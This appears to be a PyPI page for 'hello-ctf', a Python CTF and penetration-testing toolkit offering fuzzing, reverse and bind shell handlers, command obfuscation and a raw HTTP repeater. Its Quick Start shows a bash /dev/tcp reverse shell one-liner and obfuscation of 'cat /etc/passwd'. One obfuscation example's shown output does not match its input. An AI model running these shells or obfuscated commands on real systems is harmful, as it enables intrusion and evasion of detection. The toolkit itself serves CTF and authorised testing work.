Skip to main content

A professional CTF and penetration testing toolkit

Project description

hello-ctf

A professional CTF and penetration testing toolkit written in Python.

Features

🔥 Fuzzing & Brute-force

  • BurpAsync - Async concurrent fuzzing framework with rich TUI
  • BurpAsyncPool - Multi-worker parallel execution
  • WordlistLoader - High-performance wordlist loader with O(1) random access and checkpoint support

🐚 Shell & Command Execution

  • ReverseShell / BindShell - TCP shell handler with 20+ built-in templates
  • RunCmd - Non-blocking command executor with process group management
  • Obfuscator - 18+ command obfuscation techniques (base64, hex, IFS, etc.)

🌐 HTTP Tools

  • Repeater - Raw HTTP request sender with encoding support (gzip/deflate/brotli/chunked)
  • HttpEcho - Request logging server
  • HttpFile - File download server

🔧 Utilities

  • Local IP Detection - Cross-platform intelligent network interface selection

Installation

# Clone and install with uv
uv sync

# Or install as package
uv pip install -e .

Quick Start

Fuzzing with BurpAsyncPool

import asyncio
from ctf.burp.burp import BurpAsyncPool, Step

async def main():
    # Define your fuzzing steps
    steps = [
        Step("check_path", handler=check_path_handler),
        Step("verify_sqli", handler=verify_sqli_handler),
    ]

    # Run with multiple workers
    pool = BurpAsyncPool(
        payload=wordlist_generator,
        build_runtime=create_session,
        build_state=create_state,
        steps=steps,
        workers=10,
    )

    results = await pool.run()
    print(f"Found {len(results)} results")

asyncio.run(main())

Wordlist Loader

from ctf.burp.wordlist import WordlistLoader

with WordlistLoader("passwords.txt", continue_=True) as wl:
    for word in wl:
        # Resume from checkpoint automatically
        print(word)

TCP Shell

from ctf.shell.tcp_shell import ReverseShell, gen_shell_r_cmd

# Generate reverse shell command
cmd = gen_shell_r_cmd("bash_i", "10.0.0.1", 9000)
print(cmd)  # bash -i >& /dev/tcp/10.0.0.1/9000 0>&1

# Start listener
with ReverseShell(port=9000) as shell:
    shell.sendline("whoami")
    print(shell.output())

Command Obfuscation

from ctf.shell.obf import apply_obf, random_obf

# Single technique
obf_cmd = apply_obf("base64", "cat /etc/passwd")
# echo d2hvYW1p | base64 -d | bash

# Multiple techniques
obf_cmd = apply_obf("cat /etc/passwd", ["base64", "bash_c_ifs1"])

# Random obfuscation
obf_cmd = random_obf("cat /etc/passwd", depth=3)

HTTP Repeater

from ctf.http.repeater import repeater

# Simple request (string format, auto-converts to bytes)
resp = repeater(
    "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n",
    use_ssl=True,
)

print(resp.status_line())
print(resp.headers())
print(resp.body_text())

# With custom headers
req = """GET /api HTTP/1.1
Host: target.com


"""
resp = repeater(
    req,
    use_ssl=True,
    verify_ssl=False,
    headers={"Authorization": "Bearer xxx", "X-Custom": "value"},
)

Project Structure

src/ctf/
├── burp/           # Fuzzing framework
│   ├── burp.py     # BurpAsync & BurpAsyncPool
│   └── wordlist.py # WordlistLoader
├── http/           # HTTP tools
│   ├── repeater.py # HTTP client
│   └── server.py   # Echo & file servers
├── shell/          # Shell & command
│   ├── obf.py      # Command obfuscation
│   ├── run_cmd.py  # Command executor
│   └── tcp_shell.py# Reverse/Bind shell
└── utils/          # Utilities
    ├── local_ip.py # IP detection
    └── log.py      # Logging

Requirements

  • Python 3.13+
  • brotli >= 1.2.0
  • brotlipy >= 0.7.0
  • psutil >= 7.2.2
  • rich >= 15.0.0
  • xxhash >= 3.7.0

Development

# Run tests
uv run pytest

# Type check
uv run mypy src/

# Lint
uv run ruff check src/

License

MIT License

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

hello_ctf-0.0.2.tar.gz (44.1 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

hello_ctf-0.0.2-py3-none-any.whl (49.8 kB view details)

Uploaded Python 3

File details

Details for the file hello_ctf-0.0.2.tar.gz.

File metadata

  • Download URL: hello_ctf-0.0.2.tar.gz
  • Upload date:
  • Size: 44.1 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.13.12

File hashes

Hashes for hello_ctf-0.0.2.tar.gz
Algorithm Hash digest
SHA256 9abd47628966e0e2143d08d89343ace7725473bd9b3e4b111c02a4bdf2579607
MD5 1b954182ec11eb2fe5c4c18354ba19f3
BLAKE2b-256 f4a04ff7b8be3028b5458e08b168ad09f1bff192311ae2b2b033aa1eccb3cdd5

See more details on using hashes here.

File details

Details for the file hello_ctf-0.0.2-py3-none-any.whl.

File metadata

  • Download URL: hello_ctf-0.0.2-py3-none-any.whl
  • Upload date:
  • Size: 49.8 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.13.12

File hashes

Hashes for hello_ctf-0.0.2-py3-none-any.whl
Algorithm Hash digest
SHA256 acee006b0ae8cf0fee9b2a177daa91119d1b7132f037439d514dc22316e2763b
MD5 ab6b5207b54887978cd6f1f1f3f9f492
BLAKE2b-256 f0d87ee75383b188c3cb594415a8f3ac3e4483ff0c99678b2474363844c1c916

See more details on using hashes here.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page